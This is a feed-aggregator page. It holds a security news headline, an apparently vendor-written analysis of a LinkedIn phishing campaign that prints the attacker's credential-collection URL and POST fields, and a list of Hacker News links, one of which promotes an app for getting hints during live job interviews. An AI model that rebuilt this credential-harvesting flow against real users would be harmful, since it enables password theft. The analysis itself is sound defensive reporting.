Feed aggregator

The attack was claimed by a hacktivist group, but evidence showed it used infrastructure linked to Iranian government threat actors.

The post LA Metro Cyberattack Linked to Iranian State-Sponsored Hackers appeared first on SecurityWeek.

Cybercriminals are abusing Adobe infrastructure in a LinkedIn phishing campaign that steals passwords and redirects victims to the legitimate LinkedIn site afterward.

The phishing email masquerades as a business inquiry designed to look like it’s come via LinkedIn and includes a fake “contract” attachment. But it contains a number of red flags:

• The sender name, email address, and email signature don’t match
• The sender company exists, but not in the US
• The sender name exists, but not at that company
• The attachment has a double file extension: pdf.html

“I would like to do business with you via LinkedIn. I’m a buyer.

Please find attached the signed contract No. #33110:12000pcs.

I look forward to hearing from you. “

Scam or legit? Scam Guard knows.

TRY IT NOW

Double file extensions are often used to mislead recipients into thinking a file is something other than what it really is. The attached HTML file is highly obfuscated. Basically, it’s a one-line JavaScript.

The script uses two common obfuscation methods: URL encoding and Base64 . The script is divided into two Base64-encoded sections.

When you open the attachment, you’ll find a simple login form.

The target’s email address is hardcoded, and you’re unable to change or remove it. Possibly because some researchers have no qualms about flooding the receiving channel with false credentials.

But figuring out the receiving channel is where it gets interesting. Network analysis reveals this URL:

https://lnkd.tt.omtrdc.net/rest/v1/delivery

This domain belongs to Adobe and is associated with the Adobe Target A/B testing platform. But the campaign isn’t using Adobe Target to receive the phished credentials. Instead, attackers are abusing Adobe Target as a redirect/abuse point in the phishing flow. Most likely to track victims who fell for the phishing email.

In the end, it redirects the target to the legitimate business.linkedin.com site to reduce any suspicion the target may still have.

After deobfuscating the scripts, we found the destination for the submitted credentials:

All in all, even with the level of obfuscation, the method is very raw and simple:

POST to: http://a1263367.xsph.ru/taam/Ln.php

With data:

• AA = hardcoded email address
• BB = whatever password the user entered

The PHP file hosted on a .ru domain handles the redirect to LinkedIn, making the victim think they just logged in successfully.

How to stay safe

The good news: Once you know what to look for, these attacks are much easier to spot and block. The bad news: They’re cheap, scalable, and likely to keep circulating.

So, the next time a “PDF” asks for your password in a browser, pause and think about what might be hiding underneath.

Beyond avoiding unsolicited attachments, here are a few ways to stay safe:

• Only access your accounts through official apps or by typing the official website directly into your browser.
• Check file extensions carefully. Even if a file looks like a PDF, it may not be.
• Enable multi-factor authentication for your critical accounts.
• Use an up-to-date, real-time anti-malware solution with a web protection module.

Pro tip: Malwarebytes Scam Guard recognized this email as a scam.

Scammers don’t need to hack you. They just need you to click once. 

Malwarebytes Identity Theft Protection catches suspicious activity before it becomes a problem.

Article URL: https://domainalot.substack.com/p/why-selling-a-domain-is-so-expensive

Comments URL: https://news.ycombinator.com/item?id=48291678

Points: 1

# Comments: 0

Article URL: https://bluebottleware.itch.io/the-labyrinth

Comments URL: https://news.ycombinator.com/item?id=48291673

Points: 1

# Comments: 0

Article URL: https://techropa.com

Comments URL: https://news.ycombinator.com/item?id=48291656

Points: 1

# Comments: 0

Article URL: https://www.imec-int.com/en/press/world-first-imec-presents-quantum-dot-qubit-device-using-high-na-euv-lithography

Comments URL: https://news.ycombinator.com/item?id=48291648

Points: 1

# Comments: 0

Article URL: https://philpapers.org/rec/JOVSII-2

Comments URL: https://news.ycombinator.com/item?id=48291630

Points: 1

# Comments: 0

Article URL: https://punnerud.github.io/mpee/

Comments URL: https://news.ycombinator.com/item?id=48291599

Points: 3

# Comments: 1

Being a software engineer myself I understand how grueling and tiresome software engineering interviews can be. Sometimes I found myself botching technical interviews due to nerves, only to realize a few minutes after the zoom call that I knew the answer all along. Many factors can cause skilled engineers to freeze up during interviews - and let's be honest, most of the skills tested during interviews are irrelevant to the actual day to day job.

I created a Mac desktop app at https://getsotto.ai/. It's made for engineers who have studied leetcode patterns but are in need of hints to guide them in the right direction during interview time. If you're truly stuck, it will also offer a correct solution but it will not help engineers who have no data structures and algorithms experience. I welcome any feedback and please join the discord server!

Comments URL: https://news.ycombinator.com/item?id=48291585

Points: 1

# Comments: 0

Article URL: https://github.com/golang/go/issues/77273

Comments URL: https://news.ycombinator.com/item?id=48291575

Points: 1

# Comments: 0

Article URL: https://www.youtube.com/watch?v=dFtNisipSY0

Comments URL: https://news.ycombinator.com/item?id=48291548

Points: 1

# Comments: 1

Article URL: https://deepresearch.ninja/2026/05/How-AI-Agents-Actually-Work-An-Architectural-Deep-Dive/

Comments URL: https://news.ycombinator.com/item?id=48291524

Points: 1

# Comments: 0

Article URL: https://dorahacks.io/hackathon/qvac-unleach-edge-ai-i/team

Comments URL: https://news.ycombinator.com/item?id=48291518

Points: 1

# Comments: 0

Article URL: https://github.com/hieunc229/mailflare

Comments URL: https://news.ycombinator.com/item?id=48291483

Points: 3

# Comments: 1

Article URL: https://www.thetimes.com/uk/technology-uk/article/social-media-ban-under-16s-australia-instagram-8cksq7gml

Comments URL: https://news.ycombinator.com/item?id=48291477

Points: 1

# Comments: 0

Article URL: https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates

Comments URL: https://news.ycombinator.com/item?id=48291465

Points: 2

# Comments: 1

Article URL: https://www.theguardian.com/society/2026/may/27/women-faces-rated-more-attractive-study

Comments URL: https://news.ycombinator.com/item?id=48291463

Points: 1

# Comments: 0

Article URL: https://glouppe.github.io/atrophy/

Comments URL: https://news.ycombinator.com/item?id=48291455

Points: 1

# Comments: 1

Article URL: https://comuniq.xyz/post?t=1157

Comments URL: https://news.ycombinator.com/item?id=48291454

Points: 2

# Comments: 0

made a small library using GPT5.5-Pro and autoresearch

you can convert 384-dim f32 vectors go from 1536 bytes to 48 bytes without calibration. works for petabyte scale processing of text in pure online manner.

Comments URL: https://news.ycombinator.com/item?id=48291451

Points: 1

# Comments: 0